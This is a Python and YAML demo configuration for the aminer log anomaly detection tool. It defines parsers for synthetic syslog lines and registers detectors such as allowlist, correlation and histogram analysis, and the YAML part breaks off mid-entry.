The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets to the # AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append(OptionalMatchModelElement( '/', FirstMatchModelElement('FirstMatchModelElement//optional', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), SequenceModelElement('se', [ FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])]))) alphabet = b'ghijkl' service_children_ecd = [] for _, char in enumerate(alphabet): char = bytes([char]) service_children_ecd.append(FixedDataModelElement(char.decode(), char)) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('type', service_children_audit), FirstMatchModelElement('ECD', service_children_ecd), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, default_timestamp_path_list=["/model/DailyCron/DTM"]) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False) analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler") verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model) atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')), Rules.DebugMatchRule(debug_match_result=True)]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails'), Rules.DebugMatchRule(debug_match_result=True)]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filter.add_handler(parser_count) from aminer.analysis.EventTypeDetector import EventTypeDetector etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers) analysis_context.register_component(etd, component_name="EventTypeDetector") atom_filter.add_handler(etd) from aminer.analysis.VariableTypeDetector import VariableTypeDetector vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableTypeDetector") atom_filter.add_handler(vtd) from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableCorrelationDetector") atom_filter.add_handler(vtd) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filter.add_handler(ecd) from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector efd = EventFrequencyDetector(analysis_context.aminer_config, anomaly_event_handlers, window_size=0.5) analysis_context.register_component(efd, component_name="EventFrequencyDetector") atom_filter.add_handler(efd) from aminer.analysis.EventSequenceDetector import EventSequenceDetector esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron']) analysis_context.register_component(esd, component_name="EventSequenceDetector") atom_filter.add_handler(esd) from aminer.analysis.MatchFilter import MatchFilter match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[ 1, 10, 100], output_logline=True) analysis_context.register_component(match_filter, component_name="MatchFilter") atom_filter.add_handler(match_filter) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function, output_logline=True) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) import re ip_match_action = Rules.EventGenerationMatchAction( "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers) vdmt = Rules.ValueDependentModuloTimeMatchRule(None, 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3]) mt = Rules.ModuloTimeMatchRule(None, 3, 0, 3, None) time_allowlist_rules = [ Rules.AndMatchRule([ Rules.ParallelMatchRule([ Rules.ValueDependentDelegatedMatchRule([ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], { (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt, None: mt}, mt), Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action), Rules.DebugHistoryMatchRule(debug_match_result=True) ]), # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])), Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)), Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$"))) ]) ] time_allowlist_violation_detector = AllowlistViolationDetector( analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist") atom_filter.add_handler(time_allowlist_violation_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector( analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10, output_logline=True) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector( analysis_context.aminer_config, ['/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filter.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminer/demo-config.yml000066400000000000000000000704241437606560100261250ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: space type: FixedDataModelElement name: 'Space' args: ' Current Disk Data is: Filesystem Type Size Used Avail Use%' - id: data type: DelimitedDataModelElement name: 'Data' delimiter: '%''/' - id: rest type: AnyByteDataModelElement name: 'Rest' - id: userLoginDetails type: FixedDataModelElement name: 'User' args: 'User ' - id: userIpAddress type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' delimiter: ' ' - id: status type: FixedWordlistDataModelElement name: 'Status' args: - ' logged in' - ' logged out' - id: blank type: FixedDataModelElement name: 'Blank' args: ' ' - id: minutes type: DecimalIntegerValueModelElement name: 'Minutes' - id: ago type: FixedDataModelElement name: 'Ago' args: ' minutes ago.' - id: time type: SequenceModelElement name: 'Time' args: - blank - minutes - ago - id: pastTime type: OptionalMatchModelElement name: 'PastTime' args: time - id: dtm type: DateTimeModelElement name: 'DTM' date_format: '%Y-%m-%d %H:%M:%S' start_year: null text_locale: null max_time_jump_seconds: 86400 - id: uNameSpace1 type: FixedDataModelElement name: 'UNameSpace1' args: ' ' - id: uName type: DelimitedDataModelElement name: 'UName' delimiter: ' ' - id: uNameSpace2 type: FixedDataModelElement name: 'UNameSpace2' args: ' ' - id: delimitedUser type: DelimitedDataModelElement name: 'User' delimiter: ' ' - id: cron type: FixedDataModelElement name: 'Cron' args: ' cron[' - id: jobNumber type: DecimalIntegerValueModelElement name: 'JobNumber' - id: details type: FixedDataModelElement name: 'Details' args: ']: Job `cron.daily` started.' - id: spaceRandom type: FixedDataModelElement name: 'Space' args: 'Random: ' - id: random type: DecimalIntegerValueModelElement name: 'Random' - id: fixedTemp type: FixedDataModelElement name: 'FixedTemp' args: 'CPU Temp: ' - id: temp type: DecimalIntegerValueModelElement name: 'Temp' - id: degrees type: FixedDataModelElement name: 'Degrees' args: '°C' - id: cpuTemp type: SequenceModelElement name: 'CPUTemp' args: - fixedTemp - temp - degrees - id: space1 type: FixedDataModelElement name: 'Space1' args: ', ' - id: fixedWorkload type: FixedDataModelElement name: 'FixedWorkload' args: 'CPU Workload: ' - id: workload type: DecimalIntegerValueModelElement name: 'Workload' - id: percent type: FixedDataModelElement name: 'Percent' args: '%' - id: cpuWorkload type: SequenceModelElement name: 'CPUWorkload' args: - fixedWorkload - workload - percent - id: space2 type: FixedDataModelElement name: 'Space2' args: ', ' - id: action type: FixedDataModelElement name: 'Action' args: ' changed IP address to ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: fixedSpace type: FixedDataModelElement name: 'Space' args: ' ' - id: run type: FixedDataModelElement name: 'Run' args: ']: Will run job `' - id: cronType type: FixedWordlistDataModelElement name: 'CronType' args: - 'cron.daily' - 'cron.hourly' - 'cron.monthly' - 'cron.weekly' - id: startTime type: FixedDataModelElement name: 'StartTime' args: "' in 5 min." - id: emptySpace1 type: FixedDataModelElement name: 'Space1' args: ' ' - id: job type: FixedDataModelElement name: 'Job' args: ']: Job `' - id: started type: FixedDataModelElement name: 'Started' args: "' started" - id: typePath type: FixedDataModelElement name: 'type' args: 'type=PATH ' - id: msgAudit type: FixedDataModelElement name: 'msg_audit' args: 'msg=audit(' - id: msg type: DelimitedDataModelElement name: 'msg' delimiter: ':' - id: placeholder type: FixedDataModelElement name: 'placeholder' args: ':' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: item_string type: FixedDataModelElement name: 'item_string' args: '): item=' - id: item type: DecimalIntegerValueModelElement name: 'item' - id: name_string type: FixedDataModelElement name: 'name_string' args: ' name="' - id: name type: DelimitedDataModelElement name: 'name' delimiter: '"' - id: inode_string type: FixedDataModelElement name: 'inode_string' args: '" inode=' - id: inode type: DecimalIntegerValueModelElement name: 'inode' - id: dev_string type: FixedDataModelElement name: 'dev_string' args: ' dev=' - id: dev type: DelimitedDataModelElement name: 'dev' delimiter: ' ' - id: mode_string type: FixedDataModelElement name: 'mode_string' args: ' mode=' - id: mode type: DecimalIntegerValueModelElement name: 'mode' value_pad_type: "zero" - id: ouid_string type: FixedDataModelElement name: 'ouid_string' args: ' ouid=' - id: ouid type: DecimalIntegerValueModelElement name: 'ouid' - id: ogid_string type: FixedDataModelElement name: 'ogid_string' args: ' ogid=' - id: ogid type: DecimalIntegerValueModelElement name: 'ogid' - id: rdev_string type: FixedDataModelElement name: 'rdev_string' args: ' rdev=' - id: rdev type: DelimitedDataModelElement name: 'rdev' delimiter: ' ' - id: nametype_string type: FixedDataModelElement name: 'nametype_string' args: ' nametype=' - id: nametype type: FixedWordlistDataModelElement name: 'nametype' args: - 'NORMAL' - 'ERROR' - id: path type: SequenceModelElement name: 'path' args: - typePath - msgAudit - msg - placeholder - id - item_string - item - name_string - name - inode_string - inode - dev_string - dev - mode_string - mode - ouid_string - ouid - ogid_string - ogid - rdev_string - rdev - nametype_string - nametype - id: typeSyscall type: FixedDataModelElement name: 'type' args: 'type=SYSCALL ' - id: arch_string type: FixedDataModelElement name: 'arch_string' args: '): arch=' - id: arch type: DelimitedDataModelElement name: 'arch' delimiter: ' ' - id: syscall_string type: FixedDataModelElement name: 'syscall_string' args: ' syscall=' - id: syscall1 type: DecimalIntegerValueModelElement name: 'syscall' - id: success_string type: FixedDataModelElement name: 'success_string' args: ' success=' - id: success type: FixedWordlistDataModelElement name: 'success' args: - 'yes' - 'no' - id: exit_string type: FixedDataModelElement name: 'exit_string' args: ' exit=' - id: exit type: DecimalIntegerValueModelElement name: 'exit' - id: remainding_data type: AnyByteDataModelElement name: 'remainding_data' - id: syscall type: SequenceModelElement name: 'syscall' args: - typeSyscall - msgAudit - msg - placeholder - id - arch_string - arch - syscall_string - syscall1 - success_string - success - exit_string - exit - remainding_data - id: dateTimeModelElement type: DateTimeModelElement name: 'DateTimeModelElement' date_format: 'Current DateTime: %d.%m.%Y %H:%M:%S' - id: decimalFloatValueModelElement type: DecimalFloatValueModelElement name: 'DecimalFloatValueModelElement' value_sign_type: 'optional' - id: decimalIntegerValueModelElement type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' value_sign_type: 'optional' value_pad_type: 'blank' - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' delimiter: ';' - id: fixedDataModelElement1 type: FixedDataModelElement name: 'FixedDataModelElement' args: ';' - id: se type: SequenceModelElement name: 'se' args: - delimitedDataModelElement - fixedDataModelElement1 - id: fixed1 type: FixedDataModelElement name: 'fixed1' args: 'match ' - id: fixed2 type: FixedDataModelElement name: 'fixed2' args: 'fixed String' - id: wordlist type: FixedWordlistDataModelElement name: 'wordlist' args: - 'data: ' - 'string: ' - id: decimal type: DecimalIntegerValueModelElement name: 'decimal' - id: seq1 type: SequenceModelElement name: 'seq1' args: - fixed1 - wordlist - id: seq2 type: SequenceModelElement name: 'seq2' args: - fixed1 - wordlist - fixed2 - id: first type: FirstMatchModelElement name: 'first' args: - seq1 - seq2 - id: elementValueBranchModelElement type: ElementValueBranchModelElement name: 'ElementValueBranchModelElement' args: - first - 'wordlist' branch_model_dict: - id: 0 model: decimal - id: 1 model: fixed2 - id: hexStringModelElement type: HexStringModelElement name: 'HexStringModelElement' - id: fixedDataModelElement2 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'Gateway IP-Address: ' - id: ipAddressDataModelElement type: IpAddressDataModelElement name: 'IpAddressDataModelElement' - id: se2 type: SequenceModelElement name: 'se2' args: - fixedDataModelElement2 - ipAddressDataModelElement - id: multiLocaleDateTimeModelElement type: MultiLocaleDateTimeModelElement name: 'MultiLocaleDateTimeModelElement' date_formats: - format: - '%b %d %Y' - null - 'en_US.utf8' - id: fixedDataModelElementDrawnNumber type: FixedDataModelElement name: 'FixedDataModelElement' args: '[drawn number]: ' - id: decimalIntegerValueModelElement1 type: DecimalIntegerValueModelElement name: 'DecimalIntegerValueModelElement' - id: sequenceModelElement type: SequenceModelElement name: 'SequenceModelElement' args: - fixedDataModelElementDrawnNumber - decimalIntegerValueModelElement1 - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 1 - id: variableByteDataModelElement type: VariableByteDataModelElement name: 'VariableByteDataModelElement' args: '-@#' - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' - id: fixed type: FixedDataModelElement name: 'fixed' args: ' ' - id: se3 type: SequenceModelElement name: 'se3' args: - whiteSpaceLimitedDataModelElement - fixed - id: base64StringModelElement type: Base64StringModelElement name: 'Base64StringModelElement' - id: fixed3 type: FixedDataModelElement name: 'FixedDataModelElement' args: 'The-searched-element-was-found!' - id: fixedDME type: FixedDataModelElement name: 'fixedDME' args: 'Any:' - id: any type: AnyByteDataModelElement name: 'AnyByteDataModelElement' - id: seq4 type: SequenceModelElement name: 'se4' args: - fixedDME - any - id: firstMatchModelElement type: FirstMatchModelElement name: 'FirstMatchModelElement//optional' args: - fixed3 - seq4 - id: optionalMatchModelElement type: OptionalMatchModelElement name: '/' args: firstMatchModelElement - id: g type: FixedDataModelElement name: 'g' args: 'g' - id: h type: FixedDataModelElement name: 'h' args: 'h' - id: i type: FixedDataModelElement name: 'i' args: 'i' - id: j type: FixedDataModelElement name: 'j' args: 'j' - id: k type: FixedDataModelElement name: 'k' args: 'k' - id: l type: FixedDataModelElement name: 'l' args: 'l' - id: cronAnnouncement type: SequenceModelElement name: 'CronAnnouncement' args: - dtm - fixedSpace - uName - cron - jobNumber - run - cronType - startTime - id: cronExecution type: SequenceModelElement name: 'CronExecution' args: - dtm - emptySpace1 - uName - cron - jobNumber - job - cronType - started - id: dailyCron type: SequenceModelElement name: 'DailyCron' args: - dtm - uNameSpace1 - uName - uNameSpace2 - delimitedUser - cron - jobNumber - details - id: diskReport type: SequenceModelElement name: 'DiskReport' args: - space - data - rest - id: loginDetails type: SequenceModelElement name: 'LoginDetails' args: - userLoginDetails - username - status - pastTime - id: randomTime type: SequenceModelElement name: 'RandomTime' args: - spaceRandom - random - id: sensors type: SequenceModelElement name: 'Sensors' args: - cpuTemp - space1 - cpuWorkload - space2 - dtm - id: ipAddresses type: SequenceModelElement name: 'IPAddresses' args: - userIpAddress - username - action - ip - id: type type: FirstMatchModelElement name: 'type' args: - path - syscall - id: ecd type: FirstMatchModelElement name: 'ECD' args: - g - h - i - j - k - l - id: parsingME type: FirstMatchModelElement name: 'ParsingME' args: - dateTimeModelElement - decimalFloatValueModelElement - decimalIntegerValueModelElement - se - elementValueBranchModelElement - hexStringModelElement - se2 - multiLocaleDateTimeModelElement - repeatedElementDataModelElement - variableByteDataModelElement - se3 - base64StringModelElement - optionalMatchModelElement - id: model start: True type: FirstMatchModelElement name: 'model' args: - cronAnnouncement - cronExecution - dailyCron - diskReport - loginDetails - random - randomTime - sensors - ipAddresses - type - ecd - parsingME Input: timestamp_paths: ["/model/DailyCron/DTM"] adjust_timestamps: True Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: DebugMatchRule id: debug_match_rule debug_mode: True - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" - "debug_match_rule" - type: AndMatchRule id: and_match_rule2 sub_rules: - "negation_match_rule1" - "path_exists_match_rule2" - "debug_match_rule" - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" - type: ParserCount id: ParserCount report_interval: 10 - type: EventTypeDetector id: EventTypeDetector - type: VariableTypeDetector id: VariableTypeDetector event_type_detector: EventTypeDetector silence_output_except_indicator: False output_logline: False ignore_list: - "/model/RandomTime" - type: VariableCorrelationDetector id: VariableCorrelationDetector event_type_detector: EventTypeDetector ignore_list: - "/model/RandomTime" - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 0.5 - type: EventSequenceDetector id: EventSequenceDetector id_path_list: - '/model/ParsingME' ignore_list: - '/model/ECD/g' - '/model/ECD/h' - '/model/ECD/i' - '/model/ECD/j' - '/model/ECD/k' - '/model/ECD/l' - '/model/Random' - '/model/RandomTime' - '/model/DailyCron' - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True - type: ModuloTimeMatchRule id: "mt" path: null seconds_modulo: 3 lower_limit: 0 upper_limit: 3 - type: ValueDependentModuloTimeMatchRule id: "vdmt" path: null seconds_modulo: 3 paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" limit_lookup_dict: e: - 0 - 2.95 default_limit: - 0 - 3 - type: ValueDependentDelegatedMatchRule id: "value_dependent_delegated_match_rule" paths: - "/model/ECD/g" - "/model/ECD/h" - "/model/ECD/i" - "/model/ECD/j" - "/model/ECD/k" - "/model/ECD/l" rule_lookup_dict: (b"g",): "mt" (b"h",): "mt" (b"i",): "mt" (b"j",): "vdmt" (b"k",): "vdmt" (b"l",): "vdmt" None: "mt" default_rule: "mt" - type: EventGenerationMatchAction id: "ip_match_action" event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" - type: IPv4InRFC1918MatchRule id: "ipv4_in_rfc1918_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" match_action: "ip_match_action" - type: DebugHistoryMatchRule id: "debug_history_match_rule" debug_mode: True - type: ValueListMatchRule id: "value_list_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" value_list: - 134744072 - 134743044 - type: NegationMatchRule id: "negation_list" sub_rule: "value_list_match_rule" - type: ValueRangeMatchRule id: "value_range_match_rule" path: "/model/ParsingME/se2/IpAddressDataModelElement" lower_limit: 167772160 upper_limit: 184549375 - type: NegationMatchRule id: "negation_range" sub_rule: "value_range_match_rule" - type: StringRegexMatchRule id: "string_regex_match_rule" path: "/model/type/syscall/success" regex: "^no$" - type: NegationMatchRule id: "negation_string_regex" sub_rule: "string_regex_match_rule" - type: ParallelMatchRule id: "parallel_match_rule" sub_rules: - "value_dependent_delegated_match_rule" - "ipv4_in_rfc1918_match_rule" - "debug_history_match_rule" - type: AndMatchRule id: "time_and_match_rule" sub_rules: - "parallel_match_rule" - "negation_list" - "negation_range" - "negation_string_regex" - type: AllowlistViolationDetector id: TimeAllowlist allowlist_rules: - "time_and_match_rule" - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 - type: PathDependentHistogramAnalysis id: 